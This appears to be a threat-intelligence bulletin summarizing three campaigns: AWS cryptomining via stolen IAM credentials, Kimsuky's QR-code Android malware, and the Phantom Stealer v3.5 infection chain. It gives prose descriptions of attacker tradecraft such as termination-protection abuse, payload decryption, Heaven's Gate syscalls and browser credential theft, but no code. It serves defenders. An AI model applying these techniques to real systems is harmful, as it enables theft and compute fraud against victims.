Ongoing Cryptomining Campaign Targeting EC2 and ECS via Compromised IAM Credentials
Amazon’s AWS GuardDuty security team has identified an active cryptomining campaign targeting AWS customer environments by abusing valid, compromised IAM credentials rather than exploiting a software vulnerability. The operation began on November 2 and transitioned to cryptomining within roughly 10 minutes of initial access, after the actor conducted reconnaissance of EC2 service quotas and IAM permissions. The threat actor registered an ECS task definition referencing a Docker Hub image (yenik65958/secret) created on October 29, which contained the SBRMiner-MULTI cryptominer and an automated startup script; the image reportedly exceeded 100,000 pulls before removal. For ECS, the attacker configured Fargate tasks with 16,384 CPU units and 32 GB memory each, setting a desired count of 10 to rapidly scale mining capacity. AWS observed a notable persistence and response-friction technique in this campaign: the attacker used ModifyInstanceAttribute to enable termination protection by disabling API termination across launched EC2 instances, forcing defenders to explicitly remove the protection before shutdown. While termination protection is a legitimate safety feature intended to prevent accidental deletion, in this scenario, it was used to delay containment, disrupt automated remediation, and extend the time available for mining operations. After identifying the activity, AWS notified impacted customers, emphasized the need to rotate the compromised IAM credentials, and indicated that the Docker Hub image had been removed but warned that similar images could reappear under different names or accounts. This activity creates direct financial exposure through compute exhaustion, potential service instability from quota saturation, and operational disruption as responders must unwind auto-scaling and persistence controls before full termination. Recommended actions include immediately rotating and invalidating any potentially exposed IAM access keys; reviewing CloudTrail for anomalous ECS task definitions, launch templates, and scaling events; and implementing tighter IAM least-privilege controls with strong credential hygiene and automated guardrails to block unauthorized compute provisioning and to disable termination-protection abuse during incident response.
Kimsuky Mobile Malware Campaign Leveraging Weaponized QR Codes and Delivery Service Impersonation
Threat researchers have identified a sophisticated mobile malware campaign attributed to the North Korea–linked threat actor Kimsuky, leveraging weaponized QR codes and fraudulent delivery service lures to distribute Android remote access trojans. The ENKI WhiteHat Threat Research Team analyzed a new iteration of the DOCSWAP malware, delivered via phishing messages containing malicious URLs that dynamically alter content based on device type. Victims who accessed the links from desktop systems were presented with QR codes prompting mobile access, while Android users were redirected to distribution servers hosting malicious APKs disguised as legitimate security or delivery applications. The infrastructure included fake delivery-tracking pages impersonating major logistics brands, including CJ Logistics, and malware hosted on servers such as 27[.]102[.]137[.]181. Researchers identified three additional malicious applications and seven command-and-control servers using APK metadata, infrastructure overlap, and shared JARM fingerprints. The distribution workflow employed server-side logic to selectively serve malware to Android devices while logging download attempts and transmission data for operational tracking. The primary malicious application, SecDelivery[.]apk, implements a two-stage infection process that reflects a notable evolution in Kimsuky’s mobile tradecraft. Upon execution, the app decrypts an embedded secondary APK using a newly developed native decryption routine incorporating bit inversion, 5-bit rotation, and XOR encryption, replacing earlier, less sophisticated Java-based techniques. To maintain user deception, the app presents a fake authentication screen that requests a hardcoded delivery tracking number while malicious activity runs in the background. Attribution to Kimsuky is reinforced by infrastructure overlap with known Naver phishing campaigns, reused parameter structures, Korean-language code comments, and the recurring “Million OK!!!!” signature string tied to prior operations. Organizations should enforce strict mobile application vetting and permission controls, deploy mobile threat defense solutions, and provide targeted user education focused on QR-based phishing and mobile social engineering tactics to mitigate this evolving threat.
Update: Phantom Stealer v3.5 Advances with Multi-Stage Malware Techniques
Phantom Stealer, a sophisticated information-stealing malware variant, is actively conducting targeted attacks designed to exfiltrate a broad range of sensitive data from compromised systems, including credentials, financial information, and cryptocurrency assets. Security researchers have identified version 3.5 of the malware, which employs a complex multi-stage infection chain and advanced evasion mechanisms to bypass modern security controls. The attack chain begins with a deceptive file masquerading as an “Adobe 11.7.7 installer,” first observed on VirusTotal on October 29, 2025, delivered as an obfuscated XML file containing embedded JavaScript. Upon execution, the script contacts a remote command server to download and execute a PowerShell script, “floor.ps1,” using hidden execution parameters and bypassed PowerShell security policies. This script decrypts RC4-encrypted payloads that reveal a malicious [.]NET injector DLL, BLACKHAWK[.]dll, which performs in-memory process injection. By loading the final stealer payload into the legitimate Aspnet_compiler.exe process and abusing [.]NET AppDomain isolation, Phantom significantly reduces its on-disk footprint and evades file-based detection mechanisms. Once deployed, Phantom Stealer demonstrates extensive data harvesting and surveillance capabilities that pose a serious risk to both individuals and enterprises. The malware extracts AES master keys from Chromium-based browsers, enabling the decryption of stored passwords, cookies, autofill data, and payment information from browsers such as Chrome and Edge. It additionally targets cryptocurrency wallet credentials, desktop wallet data, Discord accounts, Outlook email content, Wi-Fi credentials, and detailed system and network information. Phantom incorporates intelligent keylogging that reconstructs typed content by tracking delimiters, such as spaces and return keys, further enhancing the accuracy of credential theft. To evade detection, the malware performs rigorous anti-analysis checks against a hardcoded list of 112 sandbox and analyst usernames and triggers a self-destruct routine when analysis conditions are detected. Most notably, Phantom leverages the Heaven’s Gate technique to execute 64-bit native syscalls from a 32-bit process, bypassing x86 user-mode hooks and operating beneath the visibility of many endpoint security tools. Organizations should enforce strict software download validation, deploy robust endpoint detection and response capabilities with behavioral monitoring, and maintain disciplined patching and user awareness programs to reduce exposure to advanced stealer malware of this caliber.
